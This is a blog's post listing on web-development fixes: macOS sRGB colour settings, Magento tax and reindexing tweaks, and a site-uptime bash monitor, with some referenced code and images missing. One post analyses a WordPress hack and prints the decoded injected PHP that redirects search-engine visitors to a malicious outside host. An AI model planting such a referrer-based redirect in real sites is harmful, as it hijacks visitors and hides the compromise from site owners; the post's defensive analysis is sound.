All posts by Axel

I’ve been having a frustrating issue where when you copy, then paste an image to upload to a website, the colors would be changed.

This is primarily caused by the color settings being off in the system.

Here was the problem I was experiencing:

See the difference? The copy/pasted one’s colors were dull and desaturated, but the uploaded file was correct.

To fix this issue and ensure your colors are accurate between your desktop (offline) programs, and the web, you must first make sure you are using an sRGB color profile.

Without going into to much detail, sRGB is the default color space for most applications (browsers, desktop apps etc). Everything shown on the web is essential sRGB because most browsers ignore color profiles saved to images. Here’s more on this subject: http://petapixel.com/2009/09/17/why-you-should-probably-use-srgb/

I fixed this on OSX by doing the following:

1) Open System Preferences > Displays
2) Go to the Color tab, and change your profile to an sRGB color profile (I’m using sRGB61966-2.1)

3) Make sure any image editing software, such as Photoshop is set to the same color profile:

4) Restart your computer (in OSX, even after I change the color profile, the issue persisted until I restarted).

After doing everything above, now if you copy/paste images to upload to the web, they should show the same color as what you had originally on your computer.

Hopefully this saves someone some trouble as it had me pulling out my hair for awhile!

Today I discovered that accessing my website through Google caused the site to redirect to a malicious URL. Accessing the site directly didn’t cause the redirect to initiate (because the developers of this attack specifically target search engine referrals). It’s clever, as the site owner may never become aware of the attack unless they happen to Google their own site, then try accessing it.

The method of this attack is simple. Gain access to a core WordPress file and inject some code that initiates a redirect to a specific URL.

In my case, the injected file was wp-config.php, located in the WordPress root directory.

The attacker encoded the script in a base_64 encryption, which is clever because it prevents you from searching through the file system for the known redirect URL. When someone visits your site, the code is decoded, then executed.

Using a site such as base64decode.org, you can easily see what the script contents are:

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag)
{
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0"))
{
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&amp;lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com"))
{
if (!stristr($referer,"cache") or !stristr($referer,"inurl"))
{
header("Location: http://henfra.vizvaz.com/");
exit();
}
}
}
}
}

You can see how the scripts checks for specific referrals, albeit being poorly written.

Simply removing the injected code from the file and re-saving it will prevent the malicious redirection from occurring. If it’s still happening, you may want to do a site-wide search for eval or base_64, as you know the attacker uses these functions to execute their code.

I hope this helps someone facing a similar issue. Remember, always keep your WordPress (or any CMS for that matter) up to date to prevent known security holes from being exploited.

With tax free season coming around, majority of my Magento clients requested that products set to specific categories be made tax free.

Magento sets the tax_class_id attribute on the product level, which would require me doing a batch update of the products, however I can’t set a filter to specific categories which puts me back to square one.

Below is a simple SQL query that will update all products to a Tax Class of None, based on a set of category ids I define.

Maintaining a handful of websites can be stressful. Even more so, not knowing when one of those sites goes down.

There are services such as SiteUptime that will do this for you out of the box, however there are efficient, free ways of doing this yourself.

Prerequisites:
1. You have permission to create and run bash (shell) scripts on your server.
2. You have permission to create and schedule cronjobs on your server.
3. You have permission to send emails from your server.

Ok, let’s get started.

1. Create a file on your server called monitorsites.sh (the location doesn’t matter, however I recommend keeping it outside of publicly accessible folders).
2. In monitorsites.sh, paste the following:

3. In the monitorsites.sh file, change the EMAILS variable to a comma separate list of email addresses you wish to send the notification to. For Example: EMAILS="someone@gmail.com,anotherone@gmail.com"

4. Create a file named sites.txt in the same folder as monitorsites.sh. In this file, create a list of complete URLs you wish to monitor.

5. Test the script. Login to your server using SSH, and run the bash file using the following command:sh monitorsites.sh

6. If done correctly, you will see something like this:

The HTTP server on http://www.google.com is up!
The HTTP server on http://www.axertion.com is up!
http://someotherwebsite.com (http) Failed
Alert sent to you@email.com
Alert sent to someoneelse@email.com

Once setup, your cronjob will run at the interval you set, and you will receive an email if your site doesn’t response.

Keep in mind, if your sites are on the same server as this script runs and the cause of downtime is your server going down, you may not receive the alert email. This should alert you if your apache (httpd) process fails as this script does not rely on that process to run.

1. The Rewrite rule must be placed at the top of your .htaccess file (some rules set by Magento conflict with litespeed’s rule interpreter)
2. The Rewrite rule must be formatted correctly (remove the escaping backslashes from the RewriteRule).

If you’re running a large Magento store, you may encounter an the dreaded “Please Wait” popup that hangs for a long period of time when attempting to move a category.

I looked into it, and discovered that Magneto was calling a reindexing process, which usually takes a bit of time to complete. You obviously don’t want to wait an eternity to move a single category, so you can simply do the following as a temporary way of disabling the reindexing when you move a category.

Disclaimer: This has been tested only on Magento 1.6.2

1. Open app/code/core/Mage/Catalog/Model/Category.php
2. Look for the following, around line 248: